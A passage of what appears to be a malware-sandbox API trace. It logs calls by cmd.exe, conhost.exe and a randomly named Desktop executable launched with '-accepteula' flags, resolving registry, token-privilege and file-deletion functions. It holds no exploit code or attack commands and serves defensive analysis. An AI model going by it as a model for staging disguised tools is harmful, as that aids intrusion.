| out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28f158*="Desktop") returned 0x25 [0170.351] SetErrorMode (uMode=0x0) returned 0x1 [0170.351] GetProcessHeap () returned 0x690000 [0170.351] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6a4900, Size=0x6e) returned 0x6a4900 [0170.352] GetProcessHeap () returned 0x690000 [0170.352] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x6a4900) returned 0x6e [0170.352] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0170.352] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0170.352] GetProcessHeap () returned 0x690000 [0170.352] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x120) returned 0x6a4978 [0170.352] GetProcessHeap () returned 0x690000 [0170.352] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x238) returned 0x6a4aa0 [0170.374] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0170.374] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x28eef4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eef4) returned 0x6a4c50 [0170.374] GetProcessHeap () returned 0x690000 [0170.374] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x14) returned 0x6a4c90 [0170.375] FindClose (in: hFindFile=0x6a4c50 | out: hFindFile=0x6a4c50) returned 1 [0170.375] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0170.375] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0170.375] GetConsoleTitleW (in: lpConsoleTitle=0x28f3cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0171.176] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f254, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f31c | out: lpAttributeList=0x28f254, lpSize=0x28f31c) returned 1 [0171.176] UpdateProcThreadAttribute (in: lpAttributeList=0x28f254, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f314, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f254, lpPreviousValue=0x0) returned 1 [0171.176] GetStartupInfoW (in: lpStartupInfo=0x28f210 | out: lpStartupInfo=0x28f210*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0171.177] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0171.178] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula \"blank.jtp\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x28f2b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"blank.jtp\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f2fc | out: lpCommandLine="tdq963ii.exe -accepteula \"blank.jtp\" -nobanner", lpProcessInformation=0x28f2fc*(hProcess=0x78, hThread=0x74, dwProcessId=0xa84, dwThreadId=0xae8)) returned 1 [0171.665] CloseHandle (hObject=0x74) returned 1 [0171.665] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0171.665] GetProcessHeap () returned 0x690000 [0171.665] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2c40 | out: hHeap=0x690000) returned 1 [0171.665] GetEnvironmentStringsW () returned 0x6a2c40* [0171.665] GetProcessHeap () returned 0x690000 [0171.665] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb7a) returned 0x6a7330 [0171.665] FreeEnvironmentStringsW (penv=0x6a2c40) returned 1 [0171.665] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0179.888] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x28f1f0 | out: lpExitCode=0x28f1f0*=0x1) returned 1 [0179.888] CloseHandle (hObject=0x78) returned 1 [0179.889] _vsnwprintf (in: _Buffer=0x28f338, _BufferCount=0x13, _Format="%08X", _ArgList=0x28f1fc | out: _Buffer="00000001") returned 8 [0179.889] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0179.889] GetProcessHeap () returned 0x690000 [0179.889] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x690000) returned 1 [0179.889] GetEnvironmentStringsW () returned 0x6a2c40* [0179.889] GetProcessHeap () returned 0x690000 [0179.889] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb7a) returned 0x6a7330 [0179.889] FreeEnvironmentStringsW (penv=0x6a2c40) returned 1 [0179.889] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0179.889] GetProcessHeap () returned 0x690000 [0179.889] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x690000) returned 1 [0179.889] GetEnvironmentStringsW () returned 0x6a2c40* [0179.889] GetProcessHeap () returned 0x690000 [0179.889] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb7a) returned 0x6a7330 [0179.889] FreeEnvironmentStringsW (penv=0x6a2c40) returned 1 [0179.889] GetProcessHeap () returned 0x690000 [0179.889] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a00a8 | out: hHeap=0x690000) returned 1 [0179.889] DeleteProcThreadAttributeList (in: lpAttributeList=0x28f254 | out: lpAttributeList=0x28f254) [0179.889] _get_osfhandle (_FileHandle=1) returned 0x80 [0179.889] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0179.890] _get_osfhandle (_FileHandle=1) returned 0x80 [0179.890] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0179.890] _get_osfhandle (_FileHandle=0) returned 0x3 [0179.890] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0179.890] SetConsoleInputExeNameW () returned 0x1 [0179.890] GetConsoleOutputCP () returned 0x1b5 [0179.890] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0179.890] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.891] exit (_Code=1) Process: id = "160" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x30cf7000" os_pid = "0xb1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 671 os_tid = 0xa44 Thread: id = 673 os_tid = 0x320 Thread: id = 675 os_tid = 0x6d8 Process: id = "161" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x317d4000" os_pid = "0xa2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x1c4" cmd_line = "tdq963ii.exe -accepteula -c 130 -y -p 2880 -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 674 os_tid = 0x7d8 [0171.861] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0171.862] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0171.862] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0171.862] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0171.862] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0171.863] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0171.863] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0172.332] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0172.332] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0172.332] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0172.332] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0172.332] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0172.333] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0172.333] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0172.333] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0172.333] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0172.333] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0172.333] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0172.333] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0172.334] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0172.334] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0172.334] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0172.334] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0172.334] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0172.334] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0172.334] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0172.335] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0172.335] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0172.335] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0172.335] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0172.335] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0172.335] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0172.335] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0172.336] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0172.336] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0172.336] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0172.336] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0172.336] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0172.336] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0172.337] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0172.337] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0172.337] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0172.337] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0172.337] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0172.337] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0172.337] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0172.337] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0172.337] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0172.338] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0172.338] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0172.338] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0172.338] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0172.338] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0172.338] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0172.338] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0172.338] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0172.339] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0172.339] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0172.339] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0172.339] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0172.339] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0172.339] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0172.339] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0172.340] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0172.340] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0172.340] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0172.340] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0172.340] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0172.340] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0172.340] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0172.340] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0172.340] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0172.341] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0172.341] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0172.341] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0172.341] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0172.341] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0172.341] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0172.341] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0172.341] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0172.342] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0172.342] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0172.342] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0172.342] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0172.342] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0172.342] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0172.343] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0172.343] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0172.343] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0172.343] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0172.343] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0172.343] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0172.343] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0172.344] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0172.344] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0172.344] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0172.344] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0172.344] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0172.344] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0172.344] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0172.344] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0172.344] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0172.345] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0172.345] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0172.345] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0172.345] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0172.345] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0172.345] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0172.345] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0172.345] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0172.346] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0172.346] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0172.346] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0172.346] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0172.346] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0172.346] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0172.347] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0172.347] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0172.347] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0172.347] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0172.347] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0172.347] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0172.347] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0172.348] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0172.348] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0172.348] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0172.348] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0172.349] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0172.352] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x2053d0c0, dwHighDateTime=0x1d68287)) [0172.352] GetCurrentThreadId () returned 0x7d8 [0172.352] GetCurrentProcessId () returned 0xa2c [0172.352] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=29269101263) returned 1 [0172.357] GetProcessHeap () returned 0x520000 [0172.597] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0172.597] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0172.598] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0172.598] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0172.598] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0172.598] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0172.598] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0172.598] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0172.598] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0172.598] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0172.598] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0172.598] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0172.599] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0172.599] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0172.599] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0172.599] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0172.599] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0172.599] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0172.599] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0172.599] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0172.599] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0172.599] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0172.600] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0172.600] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0172.600] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0172.600] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0172.600] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0172.600] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0172.600] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0172.600] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0172.600] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0172.601] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0172.601] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0172.601] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0172.674] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3bc) returned 0x5360c8 [0172.675] GetCurrentThreadId () returned 0x7d8 [0172.675] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x536490 [0172.675] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x800) returned 0x5364b0 [0172.675] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c 130 -y -p 2880 -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xf11655c6, hStdError=0x0)) [0172.675] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0172.675] GetFileType (hFile=0x3) returned 0x2 [0172.675] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.675] GetFileType (hFile=0x7) returned 0x2 [0172.676] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0172.676] GetFileType (hFile=0xb) returned 0x2 [0172.676] GetCommandLineW () returned="tdq963ii.exe -accepteula -c 130 -y -p 2880 -nobanner" [0172.676] GetEnvironmentStringsW () returned 0x536cb8* [0172.676] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xb86) returned 0x537848 [0172.679] FreeEnvironmentStringsW (penv=0x536cb8) returned 1 [0172.679] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0172.679] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8e) returned 0x536cb8 [0172.681] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xa0) returned 0x536d50 [0172.681] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3e) returned 0x5383f0 [0172.696] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x6c) returned 0x536df8 [0172.696] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x6e) returned 0x536e70 [0172.696] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x78) returned 0x52f8e8 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x62) returned 0x536ee8 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2e) returned 0x536f58 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x48) returned 0x536f90 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2a) returned 0x536fe0 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x28) returned 0x537018 [0172.697] 